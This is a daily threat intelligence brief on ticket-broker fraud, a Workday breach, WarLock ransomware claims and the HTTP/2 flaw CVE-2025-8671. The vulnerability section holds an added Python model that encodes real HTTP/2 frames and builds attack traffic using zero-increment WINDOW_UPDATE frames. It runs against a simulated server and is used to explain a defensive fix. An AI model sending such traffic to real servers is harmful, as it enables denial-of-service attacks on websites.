ZeroFox Daily Intelligence Brief - August 19, 2025
by Alpha Team

ZeroFox Intelligence collects, curates, and analyzes information derived from open and proprietary sources. Here is today’s daily roundup to give you and your clients an advantage over the adversary.
Brief Highlights
- Nearly 380K Tickets Illegally Bought and Resold in FTC Complaint Against Brokers
- Workday Confirms Data Breach Linked to Third-Party Database
- WarLock Ransomware Claims to have Breached Colt Telecom and Hitachi
Nearly 380K Tickets Illegally Bought and Resold in FTC Complaint Against Brokers
What we know: The FTC has sued a ticket broker operation that bypassed Ticketmaster’s purchase limits and security controls to buy tickets for high-demand events, such as Taylor Swift’s Eras Tour. The operation then resold those tickets on secondary marketplaces at inflated prices, generating millions in revenue.
Context: The brokers created thousands of fake and third-party accounts and used virtual cards, spoofed IP addresses, and SIM boxes to evade Ticketmaster’s controls. These tactics enabled them to mass-purchase nearly 380,000 tickets worth USD 57 million and resell them for USD 64 million.
Analyst note: Following this action, threat actors are likely to evolve their tactics toward impersonating event organizers or customer support. Such schemes could drive fans to fake ticketing sites, phishing emails, or counterfeit QR-code tickets that route payment to the scammer’s bank account instead of a legitimate ticketing platform.
Workday Confirms Data Breach Linked to Third-Party Database
What we know: Human resources (HR) tech giant Workday has confirmed a data breach of a third-party customer relationship management database, exposing personal details such as names, email addresses, and phone numbers. Workday emphasized that no customer tenant data appears to be affected.
Context: This incident comes amid a series of cyberattacks targeting databases, particularly Salesforce-hosted platforms that many big firms rely on for customer data storage. As of writing, Workday has not disclosed which customer relationship database was breached.
Analyst note: Even without sensitive HR files, exposed contact information enables phishing and social engineering aimed at employees and clients. Third-party breaches are becoming increasingly common, as seen in the recent Salesforce-related attacks that affected a chain of companies, and it is likely that the Workday breach is linked to that campaign.
WarLock Ransomware Claims to have Breached Colt Telecom and Hitachi
Source: https://hackread.com/warlock-ransomware-group-breach-colt-telecom-hitachi/
What we know: WarLock ransomware has claimed UK-based telecom provider Colt and Japanese conglomerate Hitachi as its latest victims on its leak site. The ransomware operation is reportedly linked to China-based threat actor “Storm-2603” and has been active since March 2025.
Context: Colt’s data is reportedly being offered for USD 200,000 on a Russian-language dark web forum. Hitachi was listed briefly before the entry was taken down, prompting speculation that negotiations may be ongoing. Separately, Australian internet provider TPG Telecom disclosed a cyber incident that exposed 280,000 email addresses and around 20,000 landline phone numbers.
Analyst note: Data leaked from telecom providers is likely to be used for surveillance and for further compromise of the affected networks, and it also poses a national security risk. However, WarLock is a newly emerged operation and has yet to substantiate its claims with leaked data.
DEEP AND DARK WEB INTELLIGENCE
NATO allegedly breached: A threat actor on a prominent dark web forum has reportedly posted a database of 15 million records related to NATO. The data allegedly includes information on military hardware and strategic planning, among other sensitive material. The records are unlikely to be new; the actor is likely seeking attention, as the post coincides with a meeting between U.S. and European leaders, including Ukrainian President Volodymyr Zelenskyy.
Noodlophile malware campaign spreads globally: Threat actors are using spear-phishing emails and updated delivery methods to spread the Noodlophile information-stealing malware, targeting enterprises in the United States, Europe, the Baltics, and the Asia-Pacific region. Such campaigns can lead to large-scale theft of sensitive corporate data, financial loss, and potential follow-on attacks like ransomware or supply chain compromises.
VULNERABILITY AND EXPLOIT INTELLIGENCE
CVE-2025-8671: This vulnerability bypasses the mitigations deployed against the HTTP/2 Rapid Reset attack. An attacker sends invalid control frames that force the server itself to reset the affected streams, so defenses that rate-limit client-sent RST_STREAM frames never trigger while the backend continues processing the requests, overwhelming the server. The flaw could enable attacks against a large number of global websites until it is fully patched across vulnerable devices.
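To make the bypass concrete, the following is an added illustrative model written for this brief; it is not code from ZeroFox, from any vendor advisory, or from any HTTP/2 implementation. It encodes and parses real HTTP/2 frame headers (RFC 9113 section 4.1) and models a server that charges stream resets against a per-connection budget. The legacy policy counts only RST_STREAM frames sent by the client, which is how Rapid Reset was mitigated. The constructed attacker traffic instead follows every request with a WINDOW_UPDATE whose increment is zero, which RFC 9113 section 6.9 requires the server to treat as a stream error: the server issues the reset, the stream slot frees, and the request is already queued at the backend. The concurrency limit, reset budget and backend accounting are simplified assumptions chosen for the example.

```python
"""Model of why a client-RST_STREAM rate limit (the usual Rapid Reset
mitigation) does not stop a reset the server is forced to issue.

Constructed for illustration; not code from ZeroFox or any HTTP/2 stack.
Frame layout and the WINDOW_UPDATE rule follow RFC 9113; the backend and
concurrency behaviour are simplified assumptions."""
from dataclasses import dataclass, field

HEADERS, RST_STREAM, WINDOW_UPDATE = 0x1, 0x3, 0x8   # RFC 9113 frame type codes
FLAG_END_STREAM = 0x1
MAX_CONCURRENT_STREAMS = 100   # assumed SETTINGS_MAX_CONCURRENT_STREAMS of the server
RESET_LIMIT = 50               # assumed resets tolerated per connection before teardown


def frame(ftype, flags, stream_id, payload=b""):
    """Encode one HTTP/2 frame: 24-bit length, type, flags, 31-bit stream id."""
    return (len(payload).to_bytes(3, "big") + bytes([ftype, flags])
            + (stream_id & 0x7FFFFFFF).to_bytes(4, "big") + payload)


def parse_frames(data):
    """Yield (type, flags, stream_id, payload) tuples from raw HTTP/2 bytes."""
    off = 0
    while off < len(data):
        if off + 9 > len(data):
            raise ValueError("truncated frame header")
        length = int.from_bytes(data[off:off + 3], "big")
        ftype, flags = data[off + 3], data[off + 4]
        stream_id = int.from_bytes(data[off + 5:off + 9], "big") & 0x7FFFFFFF
        payload = data[off + 9:off + 9 + length]
        if len(payload) != length:
            raise ValueError("truncated frame payload")
        yield ftype, flags, stream_id, payload
        off += 9 + length


@dataclass
class Server:
    count_server_resets: bool          # False = legacy policy: only client RST_STREAM counted
    open_streams: set = field(default_factory=set)
    backend_inflight: int = 0          # requests dispatched to the backend, not yet answered
    resets: int = 0                    # resets charged against this connection
    closed: bool = False               # connection torn down by the reset budget

    def _charge_reset(self):
        self.resets += 1
        if self.resets > RESET_LIMIT:
            self.closed = True

    def handle(self, ftype, flags, stream_id, payload):
        if self.closed:
            return
        if ftype == HEADERS:
            if len(self.open_streams) >= MAX_CONCURRENT_STREAMS:
                return                 # refused: the protocol-level limit holds
            self.open_streams.add(stream_id)
            self.backend_inflight += 1  # request handed to the backend immediately
        elif ftype == RST_STREAM:
            # Client cancelled the stream: this is what Rapid Reset fixes count.
            self.open_streams.discard(stream_id)
            self._charge_reset()
        elif ftype == WINDOW_UPDATE and stream_id != 0:
            if len(payload) != 4:
                self.closed = True     # RFC 9113 s6.9: connection error FRAME_SIZE_ERROR
                return
            increment = int.from_bytes(payload, "big") & 0x7FFFFFFF
            if increment == 0:
                # RFC 9113 s6.9: zero increment on a stream is a stream error, so the
                # server sends RST_STREAM(PROTOCOL_ERROR) itself. The slot frees while
                # the backend still works on the request; only the hardened policy
                # charges this server-issued reset to the connection budget.
                self.open_streams.discard(stream_id)
                if self.count_server_resets:
                    self._charge_reset()


def attack_bytes(n_requests):
    """Constructed attacker traffic: each request is followed by a malformed
    WINDOW_UPDATE so the server, not the client, resets the stream."""
    out = b""
    for i in range(n_requests):
        sid = 2 * i + 1                # client-initiated streams are odd-numbered
        # HPACK static-table indices 2 and 4 (:method GET, :path /); opaque to the model
        out += frame(HEADERS, FLAG_END_STREAM, sid, b"\x82\x84")
        out += frame(WINDOW_UPDATE, 0, sid, (0).to_bytes(4, "big"))
    return out


def run(count_server_resets, n_requests=1000):
    """Feed the constructed attack through a server using the chosen reset policy."""
    srv = Server(count_server_resets)
    for f in parse_frames(attack_bytes(n_requests)):
        srv.handle(*f)
    return srv


if __name__ == "__main__":
    for policy in (False, True):
        s = run(policy)
        print(f"count_server_resets={policy}: closed={s.closed} "
              f"backend_inflight={s.backend_inflight} open_streams={len(s.open_streams)}")
```

With the legacy policy the connection is never closed and all 1,000 requests reach the backend even though only 100 concurrent streams were ever allowed; with the hardened policy the connection is torn down after RESET_LIMIT resets regardless of which side issued them. The practical control this suggests is to charge server-issued stream errors against the same per-connection budget as client cancellations, and to bound backend work independently of the HTTP/2 stream count.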
Affected products: The affected products are included in this advisory.
Tags: DIB, tlp:green